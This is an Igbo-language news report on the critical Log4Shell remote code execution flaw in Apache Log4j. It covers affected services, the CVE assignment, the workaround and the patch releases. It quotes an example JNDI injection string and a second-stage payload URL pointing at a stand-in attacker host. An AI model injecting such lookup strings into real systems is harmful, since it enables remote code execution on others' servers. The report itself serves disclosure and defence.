Na Apache Log4j, usoro ama ama maka ịhazi ịbanye na ngwa Java, achọpụtala adịghị ike dị oke egwu nke na-enye ohere ka emee koodu akaghị aka mgbe edere uru pụrụ iche n'ụdị "{jndi:URL}" na ndekọ. Enwere ike ịme mwakpo ahụ na ngwa Java ndị na-edekọ ụkpụrụ enwetara site na isi mmalite dị na mpụga, dịka ọmụmaatụ, mgbe ha gosipụtara ụkpụrụ nsogbu na ozi njehie.
Achọpụtara na ihe fọrọ nke nta ka ọ bụrụ ọrụ niile na-eji usoro dị ka Apache Struts, Apache Solr, Apache Druid ma ọ bụ Apache Flink na-emetụta nsogbu ahụ, gụnyere Steam, Apple iCloud, ndị ahịa Minecraft na sava. A na-atụ anya na adịghị ike ahụ nwere ike ibute oke mwakpo na ngwa ụlọ ọrụ, na-ekwughachi akụkọ ihe mere eme nke adịghị ike na Apache Struts framework, nke, dị ka atụmatụ siri ike, na-eji na ngwa weebụ site na 65% nke Fortune. Ụlọ ọrụ 100. Gụnyere mbọ iji nyochaa netwọkụ maka sistemụ adịghị ike.
Nsogbu a na-akawanye njọ site n'eziokwu ahụ bụ na e bipụtalarị ihe nrigbu na-arụ ọrụ, ma edozibeghị maka alaka ndị kwụsiri ike. Edebebeghị ihe nchọpụta CVE. A na-etinye ndozi ahụ na ngalaba ule log4j-2.15.0-rc1. Dị ka ihe na-arụ ọrụ maka igbochi adịghị ike ahụ, a na-atụ aro ka ịtọ paramita log4j2.formatMsgNoLookups ka ọ bụrụ eziokwu.
Ihe kpatara nsogbu a bụ na log4j na-akwado nhazi ihe mkpuchi pụrụ iche "{}" na ahịrị mmepụta na log, nke enwere ike ịme ajụjụ JNDI (Java Naming and Directory Interface). Mwakpo a gbadara na-agafe eriri na nnọchi "${jndi:ldap://attacker.com/a}", mgbe nhazi nke log4j ga-eziga arịrịọ LDAP maka ụzọ klaasị Java na sava attacker.com. . Ụzọ nke ihe nkesa nke onye mwakpo ahụ lọghachiri (dịka ọmụmaatụ, http://second-stage.attacker.com/Exploit.class) ga-ebu ma gbuo ya na usoro nke ugbu a, nke na-enye ohere ka onye na-awakpo ahụ mebie koodu aka ike na ya. usoro na ikike nke ngwa ugbu a.
Ihe mgbakwunye 1: Enyerela adịghị ike ahụ ihe nchọpụta CVE-2021-44228.
Addendum 2: Achọpụtala ụzọ isi gafere nchebe agbakwunyere site na ntọhapụ log4j-2.15.0-rc1. Atụpụtala mmelite ọhụrụ, log4j-2.15.0-rc2, yana nchedo zuru oke megide adịghị ike ahụ. Koodu ahụ na-egosipụta mgbanwe jikọtara ya na enweghị njedebe na-adịghị mma n'ihe banyere iji URL JNDI ahazighị ezighi ezi.
isi: opennet.ru